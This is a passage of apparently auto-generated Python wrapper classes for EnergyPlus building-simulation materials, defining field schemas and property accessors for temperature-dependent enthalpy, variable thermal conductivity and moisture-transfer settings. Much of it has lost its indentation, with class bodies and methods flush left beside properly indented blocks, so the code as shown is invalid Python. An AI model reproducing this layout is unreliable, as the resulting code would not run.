    | for Temperature-enthalpy function corresponding to temperature 10
    | Units: J/kg

    Args:
        value (float): value for IDD Field `Enthalpy 10`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `enthalpy_10` or None if not set
    """
    return self["Enthalpy 10"]

@enthalpy_10.setter
def enthalpy_10(self, value=None):
    """Corresponds to IDD field `Enthalpy 10`"""
    self["Enthalpy 10"] = value
@property
def temperature_11(self):
"""field `Temperature 11`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_11` or None if not set
"""
return self["Temperature 11"]
@temperature_11.setter
def temperature_11(self, value=None):
"""Corresponds to IDD field `Temperature 11`"""
self["Temperature 11"] = value
@property
def enthalpy_11(self):
    """field `Enthalpy 11`

    | for Temperature-enthalpy function corresponding to temperature 11
    | Units: J/kg

    Args:
        value (float): value for IDD Field `Enthalpy 11`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `enthalpy_11` or None if not set
    """
    return self["Enthalpy 11"]

@enthalpy_11.setter
def enthalpy_11(self, value=None):
    """Corresponds to IDD field `Enthalpy 11`"""
    self["Enthalpy 11"] = value
@property
def temperature_12(self):
"""field `Temperature 12`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_12` or None if not set
"""
return self["Temperature 12"]
@temperature_12.setter
def temperature_12(self, value=None):
"""Corresponds to IDD field `Temperature 12`"""
self["Temperature 12"] = value
@property
def enthalpy_12(self):
    """field `Enthalpy 12`

    | for Temperature-enthalpy function corresponding to temperature 12
    | Units: J/kg

    Args:
        value (float): value for IDD Field `Enthalpy 12`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `enthalpy_12` or None if not set
    """
    return self["Enthalpy 12"]

@enthalpy_12.setter
def enthalpy_12(self, value=None):
    """Corresponds to IDD field `Enthalpy 12`"""
    self["Enthalpy 12"] = value
@property
def temperature_13(self):
"""field `Temperature 13`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_13` or None if not set
"""
return self["Temperature 13"]
@temperature_13.setter
def temperature_13(self, value=None):
"""Corresponds to IDD field `Temperature 13`"""
self["Temperature 13"] = value
@property
def enthalpy_13(self):
    """field `Enthalpy 13`

    | for Temperature-enthalpy function corresponding to temperature 13
    | Units: J/kg

    Args:
        value (float): value for IDD Field `Enthalpy 13`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `enthalpy_13` or None if not set
    """
    return self["Enthalpy 13"]

@enthalpy_13.setter
def enthalpy_13(self, value=None):
    """Corresponds to IDD field `Enthalpy 13`"""
    self["Enthalpy 13"] = value
@property
def temperature_14(self):
"""field `Temperature 14`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_14` or None if not set
"""
return self["Temperature 14"]
@temperature_14.setter
def temperature_14(self, value=None):
"""Corresponds to IDD field `Temperature 14`"""
self["Temperature 14"] = value
@property
def enthalpy_14(self):
    """field `Enthalpy 14`

    | for Temperature-enthalpy function corresponding to temperature 14
    | Units: J/kg

    Args:
        value (float): value for IDD Field `Enthalpy 14`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `enthalpy_14` or None if not set
    """
    return self["Enthalpy 14"]

@enthalpy_14.setter
def enthalpy_14(self, value=None):
    """Corresponds to IDD field `Enthalpy 14`"""
    self["Enthalpy 14"] = value
@property
def temperature_15(self):
"""field `Temperature 15`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_15` or None if not set
"""
return self["Temperature 15"]
@temperature_15.setter
def temperature_15(self, value=None):
"""Corresponds to IDD field `Temperature 15`"""
self["Temperature 15"] = value
@property
def enthalpy_15(self):
    """field `Enthalpy 15`

    | for Temperature-enthalpy function corresponding to temperature 15
    | Units: J/kg

    Args:
        value (float): value for IDD Field `Enthalpy 15`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `enthalpy_15` or None if not set
    """
    return self["Enthalpy 15"]

@enthalpy_15.setter
def enthalpy_15(self, value=None):
    """Corresponds to IDD field `Enthalpy 15`"""
    self["Enthalpy 15"] = value
@property
def temperature_16(self):
"""field `Temperature 16`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_16` or None if not set
"""
return self["Temperature 16"]
@temperature_16.setter
def temperature_16(self, value=None):
"""Corresponds to IDD field `Temperature 16`"""
self["Temperature 16"] = value
@property
def enthalpy_16(self):
    """IDD field `Enthalpy 16`.

    Enthalpy coordinate of the temperature-enthalpy function paired with
    temperature 16.

    | Units: J/kg

    Args:
        value (float): value for IDD Field `Enthalpy 16`

    Raises:
        ValueError: if `value` is not a valid value

    Returns:
        float: the value of `enthalpy_16`, or None if not set
    """
    return self["Enthalpy 16"]

@enthalpy_16.setter
def enthalpy_16(self, value=None):
    """Assign IDD field `Enthalpy 16` (Units: J/kg)."""
    self["Enthalpy 16"] = value
class MaterialPropertyVariableThermalConductivity(DataObject):
""" Corresponds to IDD object `MaterialProperty:VariableThermalConductivity`
Additional properties for temperature dependent thermal conductivity
using piecewise linear temperature-conductivity function.
HeatBalanceAlgorithm = CondFD(ConductionFiniteDifference) solution algorithm only.
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'temperature 1',
{'name': u'Temperature 1',
'pyname': u'temperature_1',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 1',
{'name': u'Thermal Conductivity 1',
'pyname': u'thermal_conductivity_1',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'temperature 2',
{'name': u'Temperature 2',
'pyname': u'temperature_2',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 2',
{'name': u'Thermal Conductivity 2',
'pyname': u'thermal_conductivity_2',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 3',
{'name': u'Temperature 3',
'pyname': u'temperature_3',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 3',
{'name': u'Thermal Conductivity 3',
'pyname': u'thermal_conductivity_3',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 4',
{'name': u'Temperature 4',
'pyname': u'temperature_4',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 4',
{'name': u'Thermal Conductivity 4',
'pyname': u'thermal_conductivity_4',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 5',
{'name': u'Temperature 5',
'pyname': u'temperature_5',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 5',
{'name': u'Thermal Conductivity 5',
'pyname': u'thermal_conductivity_5',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 6',
{'name': u'Temperature 6',
'pyname': u'temperature_6',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 6',
{'name': u'Thermal Conductivity 6',
'pyname': u'thermal_conductivity_6',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 7',
{'name': u'Temperature 7',
'pyname': u'temperature_7',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 7',
{'name': u'Thermal Conductivity 7',
'pyname': u'thermal_conductivity_7',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 8',
{'name': u'Temperature 8',
'pyname': u'temperature_8',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 8',
{'name': u'Thermal Conductivity 8',
'pyname': u'thermal_conductivity_8',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'temperature 9',
{'name': u'Temperature 9',
'pyname': u'temperature_9',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 9',
{'name': u'Thermal Conductivity 9',
'pyname': u'thermal_conductivity_9',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'temperature 10',
{'name': u'Temperature 10',
'pyname': u'temperature_10',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'thermal conductivity 10',
{'name': u'Thermal Conductivity 10',
'pyname': u'thermal_conductivity_10',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:VariableThermalConductivity',
'pyname': u'MaterialPropertyVariableThermalConductivity',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Regular Material Name to which the additional properties will be added.
| this the material name for the basic material properties.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def temperature_1(self):
"""field `Temperature 1`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_1` or None if not set
"""
return self["Temperature 1"]
@temperature_1.setter
def temperature_1(self, value=None):
"""Corresponds to IDD field `Temperature 1`"""
self["Temperature 1"] = value
@property
def thermal_conductivity_1(self):
"""field `Thermal Conductivity 1`
| for Temperature-Thermal Conductivity function corresponding to temperature 1
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_1` or None if not set
"""
return self["Thermal Conductivity 1"]
@thermal_conductivity_1.setter
def thermal_conductivity_1(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 1`"""
self["Thermal Conductivity 1"] = value
@property
def temperature_2(self):
"""field `Temperature 2`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_2` or None if not set
"""
return self["Temperature 2"]
@temperature_2.setter
def temperature_2(self, value=None):
"""Corresponds to IDD field `Temperature 2`"""
self["Temperature 2"] = value
@property
def thermal_conductivity_2(self):
"""field `Thermal Conductivity 2`
| for Temperature-Thermal Conductivity function corresponding to temperature 2
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_2` or None if not set
"""
return self["Thermal Conductivity 2"]
@thermal_conductivity_2.setter
def thermal_conductivity_2(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 2`"""
self["Thermal Conductivity 2"] = value
@property
def temperature_3(self):
"""field `Temperature 3`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_3` or None if not set
"""
return self["Temperature 3"]
@temperature_3.setter
def temperature_3(self, value=None):
"""Corresponds to IDD field `Temperature 3`"""
self["Temperature 3"] = value
@property
def thermal_conductivity_3(self):
"""field `Thermal Conductivity 3`
| for Temperature-Thermal Conductivity function corresponding to temperature 3
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_3` or None if not set
"""
return self["Thermal Conductivity 3"]
@thermal_conductivity_3.setter
def thermal_conductivity_3(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 3`"""
self["Thermal Conductivity 3"] = value
@property
def temperature_4(self):
"""field `Temperature 4`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_4` or None if not set
"""
return self["Temperature 4"]
@temperature_4.setter
def temperature_4(self, value=None):
"""Corresponds to IDD field `Temperature 4`"""
self["Temperature 4"] = value
@property
def thermal_conductivity_4(self):
"""field `Thermal Conductivity 4`
| for Temperature-Thermal Conductivity function corresponding to temperature 4
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_4` or None if not set
"""
return self["Thermal Conductivity 4"]
@thermal_conductivity_4.setter
def thermal_conductivity_4(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 4`"""
self["Thermal Conductivity 4"] = value
@property
def temperature_5(self):
"""field `Temperature 5`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_5` or None if not set
"""
return self["Temperature 5"]
@temperature_5.setter
def temperature_5(self, value=None):
"""Corresponds to IDD field `Temperature 5`"""
self["Temperature 5"] = value
@property
def thermal_conductivity_5(self):
"""field `Thermal Conductivity 5`
| for Temperature-Thermal Conductivity function corresponding to temperature 5
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_5` or None if not set
"""
return self["Thermal Conductivity 5"]
@thermal_conductivity_5.setter
def thermal_conductivity_5(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 5`"""
self["Thermal Conductivity 5"] = value
@property
def temperature_6(self):
"""field `Temperature 6`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_6` or None if not set
"""
return self["Temperature 6"]
@temperature_6.setter
def temperature_6(self, value=None):
"""Corresponds to IDD field `Temperature 6`"""
self["Temperature 6"] = value
@property
def thermal_conductivity_6(self):
"""field `Thermal Conductivity 6`
| for Temperature-Thermal Conductivity function corresponding to temperature 6
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_6` or None if not set
"""
return self["Thermal Conductivity 6"]
@thermal_conductivity_6.setter
def thermal_conductivity_6(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 6`"""
self["Thermal Conductivity 6"] = value
@property
def temperature_7(self):
"""field `Temperature 7`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_7` or None if not set
"""
return self["Temperature 7"]
@temperature_7.setter
def temperature_7(self, value=None):
"""Corresponds to IDD field `Temperature 7`"""
self["Temperature 7"] = value
@property
def thermal_conductivity_7(self):
"""field `Thermal Conductivity 7`
| for Temperature-Thermal Conductivity function corresponding to temperature 7
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_7` or None if not set
"""
return self["Thermal Conductivity 7"]
@thermal_conductivity_7.setter
def thermal_conductivity_7(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 7`"""
self["Thermal Conductivity 7"] = value
@property
def temperature_8(self):
"""field `Temperature 8`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_8` or None if not set
"""
return self["Temperature 8"]
@temperature_8.setter
def temperature_8(self, value=None):
"""Corresponds to IDD field `Temperature 8`"""
self["Temperature 8"] = value
@property
def thermal_conductivity_8(self):
"""field `Thermal Conductivity 8`
| for Temperature-Thermal Conductivity function corresponding to temperature 8
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_8` or None if not set
"""
return self["Thermal Conductivity 8"]
@thermal_conductivity_8.setter
def thermal_conductivity_8(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 8`"""
self["Thermal Conductivity 8"] = value
@property
def temperature_9(self):
"""field `Temperature 9`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_9` or None if not set
"""
return self["Temperature 9"]
@temperature_9.setter
def temperature_9(self, value=None):
"""Corresponds to IDD field `Temperature 9`"""
self["Temperature 9"] = value
@property
def thermal_conductivity_9(self):
"""field `Thermal Conductivity 9`
| for Temperature-Thermal Conductivity function corresponding to temperature 9
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_9` or None if not set
"""
return self["Thermal Conductivity 9"]
@thermal_conductivity_9.setter
def thermal_conductivity_9(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 9`"""
self["Thermal Conductivity 9"] = value
@property
def temperature_10(self):
"""field `Temperature 10`
| for Temperature-Thermal Conductivity function
| Units: C
Args:
value (float): value for IDD Field `Temperature 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_10` or None if not set
"""
return self["Temperature 10"]
@temperature_10.setter
def temperature_10(self, value=None):
"""Corresponds to IDD field `Temperature 10`"""
self["Temperature 10"] = value
@property
def thermal_conductivity_10(self):
"""field `Thermal Conductivity 10`
| for Temperature-Thermal Conductivity function corresponding to temperature 10
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_10` or None if not set
"""
return self["Thermal Conductivity 10"]
@thermal_conductivity_10.setter
def thermal_conductivity_10(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 10`"""
self["Thermal Conductivity 10"] = value
class MaterialPropertyHeatAndMoistureTransferSettings(DataObject):

    """Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:Settings`.

    HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
    Additional material properties for surfaces.
    Has no effect with other HeatBalanceAlgorithm solution algorithms.
    """

    # IDD-derived field metadata consumed by the DataObject base class:
    # field order, python attribute names, types, units, defaults and
    # min/max validation bounds for each IDD field of this object.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'material name',
                                       {'name': u'Material Name',
                                        'pyname': u'material_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'porosity',
                                       {'name': u'Porosity',
                                        'pyname': u'porosity',
                                        'maximum': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/m3'}),
                                      (u'initial water content ratio',
                                       {'name': u'Initial Water Content Ratio',
                                        'pyname': u'initial_water_content_ratio',
                                        'default': 0.2,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kg/kg'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'MaterialProperty:HeatAndMoistureTransfer:Settings',
               'pyname': u'MaterialPropertyHeatAndMoistureTransferSettings',
               'required-object': False,
               'unique-object': False}

    @property
    def material_name(self):
        """field `Material Name`

        | Material Name that the moisture properties will be added to.
        | This augments material properties needed for combined heat and moisture transfer for surfaces.

        Args:
            value (str): value for IDD Field `Material Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `material_name` or None if not set
        """
        return self["Material Name"]

    @material_name.setter
    def material_name(self, value=None):
        """Corresponds to IDD field `Material Name`"""
        self["Material Name"] = value

    @property
    def porosity(self):
        """field `Porosity`

        | Units: m3/m3
        | value <= 1.0

        Args:
            value (float): value for IDD Field `Porosity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `porosity` or None if not set
        """
        return self["Porosity"]

    @porosity.setter
    def porosity(self, value=None):
        """Corresponds to IDD field `Porosity`"""
        self["Porosity"] = value

    @property
    def initial_water_content_ratio(self):
        """field `Initial Water Content Ratio`

        | units are the water/material density ratio at the beginning of each run period.
        | Units: kg/kg
        | Default value: 0.2

        Args:
            value (float): value for IDD Field `Initial Water Content Ratio`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `initial_water_content_ratio` or None if not set
        """
        return self["Initial Water Content Ratio"]

    @initial_water_content_ratio.setter
    def initial_water_content_ratio(self, value=0.2):
        """Corresponds to IDD field `Initial Water Content Ratio`"""
        self["Initial Water Content Ratio"] = value
class MaterialPropertyHeatAndMoistureTransferSorptionIsotherm(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:SorptionIsotherm`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Relationship between moisture content and relative humidity fraction.
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'material name',
{'name': u'Material Name',
'pyname': u'material_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'number of isotherm coordinates',
{'name': u'Number of Isotherm Coordinates',
'pyname': u'number_of_isotherm_coordinates',
'maximum': 25,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'relative humidity fraction 1',
{'name': u'Relative Humidity Fraction 1',
'pyname': u'relative_humidity_fraction_1',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 1',
{'name': u'Moisture Content 1',
'pyname': u'moisture_content_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 2',
{'name': u'Relative Humidity Fraction 2',
'pyname': u'relative_humidity_fraction_2',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 2',
{'name': u'Moisture Content 2',
'pyname': u'moisture_content_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 3',
{'name': u'Relative Humidity Fraction 3',
'pyname': u'relative_humidity_fraction_3',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 3',
{'name': u'Moisture Content 3',
'pyname': u'moisture_content_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 4',
{'name': u'Relative Humidity Fraction 4',
'pyname': u'relative_humidity_fraction_4',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 4',
{'name': u'Moisture Content 4',
'pyname': u'moisture_content_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 5',
{'name': u'Relative Humidity Fraction 5',
'pyname': u'relative_humidity_fraction_5',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 5',
{'name': u'Moisture Content 5',
'pyname': u'moisture_content_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 6',
{'name': u'Relative Humidity Fraction 6',
'pyname': u'relative_humidity_fraction_6',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 6',
{'name': u'Moisture Content 6',
'pyname': u'moisture_content_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 7',
{'name': u'Relative Humidity Fraction 7',
'pyname': u'relative_humidity_fraction_7',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 7',
{'name': u'Moisture Content 7',
'pyname': u'moisture_content_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 8',
{'name': u'Relative Humidity Fraction 8',
'pyname': u'relative_humidity_fraction_8',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 8',
{'name': u'Moisture Content 8',
'pyname': u'moisture_content_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 9',
{'name': u'Relative Humidity Fraction 9',
'pyname': u'relative_humidity_fraction_9',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 9',
{'name': u'Moisture Content 9',
'pyname': u'moisture_content_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 10',
{'name': u'Relative Humidity Fraction 10',
'pyname': u'relative_humidity_fraction_10',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 10',
{'name': u'Moisture Content 10',
'pyname': u'moisture_content_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 11',
{'name': u'Relative Humidity Fraction 11',
'pyname': u'relative_humidity_fraction_11',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 11',
{'name': u'Moisture Content 11',
'pyname': u'moisture_content_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 12',
{'name': u'Relative Humidity Fraction 12',
'pyname': u'relative_humidity_fraction_12',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 12',
{'name': u'Moisture Content 12',
'pyname': u'moisture_content_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 13',
{'name': u'Relative Humidity Fraction 13',
'pyname': u'relative_humidity_fraction_13',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 13',
{'name': u'Moisture Content 13',
'pyname': u'moisture_content_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 14',
{'name': u'Relative Humidity Fraction 14',
'pyname': u'relative_humidity_fraction_14',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 14',
{'name': u'Moisture Content 14',
'pyname': u'moisture_content_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 15',
{'name': u'Relative Humidity Fraction 15',
'pyname': u'relative_humidity_fraction_15',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 15',
